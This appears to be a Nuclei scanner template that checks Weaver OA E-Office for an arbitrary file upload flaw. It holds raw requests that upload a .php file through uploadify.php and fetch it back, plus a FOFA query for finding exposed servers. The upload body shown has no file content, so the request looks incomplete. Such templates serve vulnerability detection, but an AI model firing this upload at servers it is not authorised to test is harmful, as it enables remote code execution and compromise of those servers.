id: weaver-jquery-file-upload info: name: OA E-Office jQuery - Arbitrary File Upload author: SleepingBag945 severity: critical description: Arbitrary File Upload in OA E-Office jQuery. reference: - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py classification: cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 fofa-query: app="泛微-EOffice" product: e-office vendor: weaver tags: weaver,e-office,oa,instrusive,rce,intrusive variables: filename: "{{to_lower(rand_base(5))}}" string: "{{randstr}}" http: - raw: - | GET /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} - | POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjetvpuye Accept-Encoding: gzip ------WebKitFormBoundaryjetvpuye Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.php" Content-Type: application/octet-stream ------WebKitFormBoundaryjetvpuye-- - | GET /attachment/{{attachmentID}}/{{filename}}.php HTTP/1.1 Host: {{Hostname}} extractors: - type: regex name: attachmentID internal: true regex: - "[0-9]{10}" matchers-condition: and matchers: - type: dsl dsl: - "status_code_1 == 200" - "status_code_3 == 200 && contains(body_3,'{{string}}')" condition: and # digest: 4b0a00483046022100fe917c306ebcce567dd4f284a40bb1423bdad8d0decb0f54bf5d7a44287db986022100c32dbe41f06f36453e55c7204e336531f8175def5fffa0904d0c8e9034a363bb:922c64590222798bb761d5b6d8e72950